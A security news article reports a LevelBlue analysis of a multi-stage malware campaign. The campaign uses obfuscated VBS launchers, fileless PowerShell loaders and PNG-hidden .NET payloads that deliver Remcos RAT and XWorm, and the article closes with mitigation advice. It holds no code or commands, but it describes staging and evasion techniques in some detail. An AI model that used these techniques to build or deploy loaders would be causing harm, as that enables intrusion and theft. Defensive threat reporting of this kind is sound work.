A sophisticated, multi-stage delivery framework leveraging obfuscated Visual Basic Script (VBS) files, fileless PowerShell loaders, and payloads hidden within PNG images.
The activity was initially detected by LevelBlue’s Managed Detection and Response (MDR) SOC through a SentinelOne alert involving a suspicious VBS file.
The file, identified as Name_File.vbs, was located in a public downloads directory and was blocked before execution. Despite successful containment, deeper analysis exposed a far more complex operation involving modular loaders and reusable attacker infrastructure.
During triage, analysts found no prior reputation for the file hash and no related activity in historical telemetry, suggesting an isolated event.
However, SentinelOne telemetry revealed that the script contained a Base64-encoded PowerShell command, prompting further investigation.
LevelBlue SpiderLabs initiated an investigation into a multi-stage malware delivery campaign initially identified from LevelBlue’s MDR SOC through a SentinelOne detection.
Decoding the VBS file showed it functioned primarily as an obfuscated launcher. Heavy Unicode-based obfuscation concealed its logic, which ultimately reconstructed and executed a hidden PowerShell payload at runtime.
Fileless Loader and PNG Payloads
The decoded PowerShell script behaved as a fileless loader. It enforced TLS 1.2 connections and used the Net webClient class to retrieve remote content. Instead of downloading a traditional executable, the script fetched a PNG image from a remote server.
Inside the PNG file, researchers discovered embedded Base64-encoded data marked by custom “BaseStart” and “BaseEnd” tags.
This data contained a .NET assembly that was decoded and executed directly in memory using reflection, a technique commonly associated with the PhantomVAI loader.
This approach allowed the malware to avoid writing files to disk, significantly reducing detection by traditional security tools.
Artifacts within this directory included a batch script (44rrr.bat) and a compressed archive masquerading as a PDF (Invoice-JL1852586778.pdf.zip) as shown previously.
Once executed, the in-memory loader retrieved additional payloads from attacker-controlled infrastructure.
One obfuscated URL resolved to a text file containing encoded data that ultimately deployed Remcos RAT, a well-known remote access trojan. Another payload included a UAC bypass DLL to escalate privileges.
The execution chain demonstrated a clear separation of roles: the VBS acted as the entry point, PowerShell handled delivery, and the .NET loader managed payload execution and persistence.
Open Directory Infrastructure
Further investigation uncovered that the attack was supported by an open-directory architecture hosted on a domain with multiple accessible paths, such as /coupon/, /protector/, and /invoice/.
These directories contained numerous obfuscated VBS files mapped to different malware payloads, including XWorm and other RAT variants. This structure allowed attackers to reuse the same loader framework while swapping payloads as needed.
Notably, the /invoice/ directory revealed a separate infection vector involving a fake PDF file distributed as a ZIP archive.
The secondary chain included batch scripts encoded in UTF-16LE that executed in hidden mode and initiated outbound connections to retrieve more payloads. Analysis showed deployment of Python-based malware, including components linked to the Kramer family.
These scripts performed memory injection, shellcode execution, and further payload staging, often using deceptively named directories such as “MainRingtones” to evade suspicion.
The file contained a malicious internet shortcut that redirected victims to attacker-controlled Cloudflare infrastructure, triggering additional downloads and execution.
Researchers concluded that this campaign represents a scalable and reusable malware framework rather than a single attack. The use of open directories, fileless techniques, and multi-language payloads increases both flexibility and evasion.
The campaign highlights how attackers combine scripting, cloud hosting, and non-traditional file formats to bypass defenses while maintaining rapid payload rotation capabilities.
To mitigate such threats, organizations should restrict execution of scripts like VBS and BAT files, especially from user-writable locations. Monitoring PowerShell activity and in-memory execution is critical, along with blocking suspicious domains and limiting WebDAV traffic.
LevelBlue has since deployed custom detections targeting similar VBS loaders, PNG-based payload staging, and related infrastructure, strengthening defenses against this evolving threat model.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
